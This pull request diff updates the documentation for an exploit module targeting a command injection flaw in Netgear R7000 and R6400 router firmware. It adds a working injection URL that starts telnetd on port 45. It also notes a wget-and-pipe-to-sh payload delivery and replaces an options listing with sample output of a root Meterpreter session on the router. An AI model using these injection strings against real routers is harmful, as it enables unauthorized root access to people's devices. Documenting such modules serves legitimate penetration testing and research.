### PR TITLE
Update Netgear R7000 cgibin exec docs

### DIFF
--- a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md
@@ -1,4 +1,4 @@
-The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. 
+The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
 
 
 ## Vulnerable Application
@@ -12,47 +12,39 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
   3. Do: `set RHOST <RouterIP>`
   4. Do: `set PAYLOAD <payload>`
   5. Do: `run`
-  6. If the router is a R7000 or R6400, the module should run
+  6. If the router is a R7000 or R6400, you should get a session
 
 ## Options
 
   **PAYLOAD**
   
-  The valid payloads are `cmd/unix` payloads _only_, as this is a command execution module
+  The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
 
 ## Scenarios
 
-  Sample output of the options looks like so 
-
+  Sample output of a successful session:
+  
   ```
-  msf exploit(netgear_r7000_cgibin_exec) > options
+  msf exploit(netgear_r7000_cgibin_exec) > run
 
-Module options (exploit/linux/http/netgear_r7000_cgibin_exec):
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Router is a NETGEAR router (R7000)
+[+] Router may be vulnerable (NETGEAR R7000)
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://[redacted]:8080/
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600
+[*] Server stopped.
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST    192.168.1.1      yes       The target address
-   RPORT    80               yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
-
-
-Payload options (cmd/unix/reverse_bash):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  192.168.153.34   yes       The listen address
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Automatic Target
-
-msf exploit(netgear_r7000_cgibin_exec) > 
+meterpreter > getuid 
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo 
+Computer     : 192.168.1.4
+OS           :  (Linux 2.6.36.4brcmarm+)
+Architecture : armv7l
+Meterpreter  : armle/linux
+meterpreter > 
   ```
+  
+  As you can see, the `uid` is 0, meaning you have root access.
   
   


### PR DESCRIPTION
When #7968 this was merged, the docs weren't changed for the new revision of the module. The docs were still saying that the payloads were `cmd/unix` payloads instead of `mettle` payloads. This PR just updates the docs to the newer module output and options. The `options` output is replaced with a successful session output.
